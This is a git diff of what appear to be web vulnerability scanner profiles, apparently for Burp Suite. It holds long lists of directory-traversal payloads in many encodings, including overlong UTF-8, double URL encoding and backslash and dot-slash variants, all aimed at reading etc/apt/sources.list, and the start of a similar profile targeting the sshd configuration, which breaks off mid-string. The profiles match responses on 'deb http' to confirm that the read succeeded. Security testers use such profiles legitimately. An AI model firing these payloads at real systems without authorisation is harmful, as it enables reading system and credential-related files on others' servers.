+ "true,..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,///%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,\\\\\\%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..//{FILE}",
+ "true,..//..//{FILE}",
+ "true,..//..//..//{FILE}",
+ "true,..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//..//{FILE}",
+ "true,..///{FILE}",
+ "true,..///..///{FILE}",
+ "true,..///..///..///{FILE}",
+ "true,..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///..///{FILE}",
+ "true,..\\\\{FILE}",
+ "true,..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,./\\/./{FILE}",
+ "true,./\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,./../{FILE}",
+ "true,./.././../{FILE}",
+ "true,./.././.././../{FILE}",
+ "true,./.././.././.././../{FILE}",
+ "true,./.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././.././../{FILE}",
+ "true,.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.//..//{FILE}",
+ "true,.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,../{FILE}",
+ "true,../..//{FILE}",
+ "true,../..//../{FILE}",
+ "true,../..//../..//{FILE}",
+ "true,../..//../..//../{FILE}",
+ "true,../..//../..//../..//{FILE}",
+ "true,../..//../..//../..//../{FILE}",
+ "true,../..//../..//../..//../..//{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..///{FILE}",
+ "true,../..///{FILE}",
+ "true,../..//..///{FILE}",
+ "true,../..//../..///{FILE}",
+ "true,../..//../..//..///{FILE}",
+ "true,../..//../..//../..///{FILE}",
+ "true,../..//../..//../..//..///{FILE}",
+ "true,../..//../..//../..//../..///{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,deb http"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Linux-source-list",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Linux-source-list",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{FILE}",
+ "replace": "etc/apt/sources.list",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Linux-sshd-conf.bb b/profiles/Linux-sshd-conf.bb
index c353771..42e7c29 100755
--- a/profiles/Linux-sshd-conf.bb
+++ b/profiles/Linux-sshd-conf.bb
@@ -1 +1,950 @@
-[{"Name":"Linux-sshd-conf","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%2